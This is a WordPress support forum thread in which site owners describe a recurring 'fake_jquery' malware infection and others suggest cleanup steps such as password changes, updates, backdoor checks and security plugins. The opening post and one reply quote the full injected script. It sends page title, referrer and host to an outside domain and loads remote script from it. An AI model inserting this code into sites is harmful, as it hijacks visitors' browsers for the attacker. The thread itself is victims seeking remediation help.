Support » Plugins » WordPress Blog Infected With Malware – Malware.fake_jquery.001

  • Hi, recently most of my WordPress sites got infected with malware.

    Problems:

    After scanning my sites on https://sitecheck.sucuri.net/ I receive the message as below:

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://geralddeanmandiri.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

    I tried to install WordFence Plugin (and turn on all the options in this plugin) to scan my sites but it couldn’t detect the malware.

    I then went to edit my theme at editor section and I open the header.php file and look for the malware script just before the </head> tag.

    I then removed the script and save the file.

    Results

    By removing the script before the </head> tag of the header.php file, it worked for some websites and it didn’t work for other sites.

    I ran the scan on https://sitecheck.sucuri.net/ again, some of my sites were safe and some still had that malware script on categories, pages or even on the urls that don’t exist on my blog.

    Problems

    The sites that I removed the malware script from and were marked safe had the malware come back on the next day!

    Maybe the malware is somewhere on my server or something and it keeps injecting the malware script into my blog even when I removed it?

    Question

    How do I solve this problem and remove this stupid malware for good? What plugin do you recommend? What cleaning method do you suggest?

    Thank you everyone!

    Please help!

Viewing 15 replies - 1 through 15 (of 18 total)
  • Sucuri has a 404 page for that malware definition and I hope it is updated soon.

    the page is here: http://labs.sucuri.net/signatures/malware-entry-mwjsgen2
    did you manage to clean up your website?

    Yes I cleaned it up by removing the script from theme editor and it’s fine for 1 week and now it’s back again! Any better way please? 🙁

    the same here. still looking for code to clean

    Is possible hacker may have added the code into the actual page or post.

    Go to the page or post in question and view as text, then scroll down.

    Same problem here. Every day the code is back.

    My wp-includes/nav-menu.php was infected with strange code, I removed that code. Further I found a strange PHP-file (license.php) in wp-includes/Text/.

    All removed and still code is coming back. I will keep searching.

    In the audit log of plugin Sucuri Security I saw that user ‘system’ with IP ::1 changed the header.php of my template again yesterday evening.

    Yes I removed it from The Theme Header (header.php) and it’s all good then the next they it comes back again.

    Here’s the new code:

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://wildwillis.net/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

    Does anyone know how to solve this problem please?

    Having the same issue – any recommendations on how to fix it?

    If the malware continues to reappear after you’ve removed the offending script then there must be some vulnerable software on your site, compromised password, injected backdoor or bogus wp-admin administrator user that is being used to reinfect.

    Once you remove the malicious script be sure to:

    1) Update all software (WP core, plugins and themes)
    2) Change all administrator passwords (wp-admin, FTP, cPanel, etc)
    3) Check for any bogus wp-admin administrator users

    If the problem continues I would recommend replacing your core WordPress files. It also wouldn’t hurt to reinstall your plugins/themes in the event that there is some injected backdoor there.

    There are also some common places to hide backdoors like in these directories:

    ./wp-content
    ./wp-content/plugins
    ./wp-content/themes

    Often the index.php file in those directories gets overwritten, or they add some file with a name like plugin.php or css.php or something like that, but there are many other places they can be hiding.

    This article goes into some more detail:

    https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

    I hope that helps.

    Hi rngdmstr, Isaw that article and I removed the malware from header.php and update everything. However the malware still come back.

    That article also say ” check for the jquery.min.php in the /js directory.”

    I try to find that code in the js directory but it’s not there. I’m not sure where on the server that the malware get injected automatically again.

    Thanks for your suggestion anyway.

    Any other advice would be greatly appreciated.

    Hi Everyone,

    I too was having the same problem with several of my websites. I think I have found the solution, since the malware hasn’t returned yet.

    1. Change your cpanel password and to be safe, change your WordPress password. I realized after removing the malware, it was always returning. Which means there was a script file added to my server, that wasn’t show up on the malware scan.

    2. Download the Sucuri malware plugin. Once the plugin is installed and you get your API key, go the the Sucuri dashboard. There will be a red/pink box informing you, that there has been a change made to your wordpress core files. Delete any files you do not recognize (The file will be something very deceiving, like .ftpquota) . (This will delete the script file that keep reinstalling the malware to your website.) You can do a malware scan and pay to have Sucuri remove the malware. I’m not sure how much it cost, if you do not want to pay head to step 3.

    3. Download the Anti-Malware plugin, get your API key and download the newest definitions. Run a complete website scan, it should find the malware , remove it once it is finish downloading. I would suggest donating the $29 for such and awesome plugin! Most companies will charge $200+ to remove the malware.

    These are the steps I took to clean my sites. If there is any change to any of my sites I will reply with new changes I have made or if anyone needs any help feel free to contact me.

    Thank you

    liemng007 does this site reside in the same hosting environment as other websites? Is it a shared hosting environment? The issue might be cross-contamination:

    http://blog.sucuri.net/2012/03/a-little-tale-about-website-cross-contamination.html

    i’ve solved the issue installing Sucuri plugin and “hardening” directories wp-content and wp-includes.

    I already deleted the injected codes on my header.php but still when i scan my website it seems like it is still in some of my pages
    https://sitecheck.sucuri.net/results/bnacedu.com

    Can anyone help me?

    @24eagle1989 the malicious code could be in a few different places, but it’s common to find this infection within theme files. Try uploading a fresh copy of your theme and see if that helps. Be sure to flush any cache you are using on the site before rescanning with Sitecheck.

Viewing 15 replies - 1 through 15 (of 18 total)
  • The topic ‘WordPress Blog Infected With Malware – Malware.fake_jquery.001’ is closed to new replies.